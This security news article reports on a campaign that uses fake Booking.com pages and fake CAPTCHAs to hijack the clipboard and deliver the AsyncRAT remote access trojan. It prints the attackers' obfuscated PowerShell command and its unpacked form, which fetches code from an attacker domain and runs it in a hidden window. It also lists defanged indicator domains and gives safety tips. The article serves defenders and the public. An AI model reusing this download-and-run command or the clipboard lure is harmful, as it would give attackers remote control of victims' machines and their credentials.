Fake Booking.com Sites Spread AsyncRAT Malware in Holiday-Themed Scam

With the summer travel season in full swing, cybercriminals have launched a sophisticated campaign targeting travelers through fake Booking.com websites, redirect links, and fraudulent sponsored ads.

According to recent research by Malwarebytes, this campaign leverages evolving domains, fake CAPTCHAs, and dangerous clipboard hijacking techniques to deliver AsyncRAT malware—a Remote Access Trojan that poses severe risks to users’ data and privacy.

Evolving Attack Tactics: From Sponsored Ads to Fake CAPTCHAs

The scam first appeared in mid-May and continues to evolve, with threat actors rotating malicious domains every two to three days to evade detection and blacklists.

The attack vector typically begins when users, searching for travel deals, land on a malicious link disguised as a legitimate Booking.com page—often through gaming sites, social platforms, or sponsored advertisements.

Upon arrival, visitors are greeted by a fake CAPTCHA form, a technique increasingly popular among fraudsters.

Unlike legitimate CAPTCHAs, this prompt is designed to grant the site permission to access the user’s clipboard. When unsuspecting users tick the box, a script quietly injects malicious content into their clipboard.

Technical Breakdown: Clipboard Hijacking and PowerShell Payloads

The clipboard injection, executed via JavaScript’s document.execCommand('copy'), plants an obfuscated PowerShell command. The attackers employ deliberate casing, variable name fragments, and quote interruptions to obfuscate their real intentions:

powershellpOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"

Unpacked, it becomes:

powershellpowershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"

If a user follows the on-screen instructions—typically prompting them to paste and execute this command in the Windows Run dialog—a PowerShell window opens invisibly, fetching and running two executables (ckjg.exe and Stub.exe) from the attacker’s server.

The payload, detected as Backdoor.AsyncRAT, gives full remote control of the victim’s machine to attackers, enabling theft of credentials, financial data, and potentially far-reaching identity fraud.

Detection, Prevention, and Indicators of Compromise

Users of security tools such as Malwarebytes Browser Guard are alerted when their clipboard is accessed, often with explicit warnings about suspicious content.

Chrome may also display generic warnings about unsafe sites, though these can be vague and easily ignored without awareness of the underlying risk.

Malwarebytes researchers have tracked several domains associated with this campaign, with the URLs changing every few days. Recent examples include:

• booking.chargedguestescenter[.]com
• booking.badgustrewivers[.]com
• booking.property-paids[.]com
• booking.guestsalerts[.]com
• bkngnet[.]com

Anyone booking travel online, especially via search engines, should exercise extreme caution and verify URLs carefully.

Staying Safe: Best Practices for Travelers

• Think before you click: Never follow instructions to copy-paste or execute unfamiliar commands, especially prompted by a CAPTCHA form or pop-up.
• Use security software: Install reputable anti-malware solutions and enable browser extensions that block malicious domains and clipboard access.
• Limit JavaScript: Disabling JavaScript can prevent clipboard exploits like this, but be aware it may disrupt browsing on legitimate sites—consider using different browsers for high-risk activities.
• Check warnings: Don’t ignore browser and security tool alerts; investigate any unusual or unexpected prompts, especially when dealing with travel bookings online.

As holiday scams grow more sophisticated, vigilance and technical awareness are key to safe and stress-free travel planning. Always book through trusted sources and watch for red flags—your vacation plans, and your personal data, depend on it.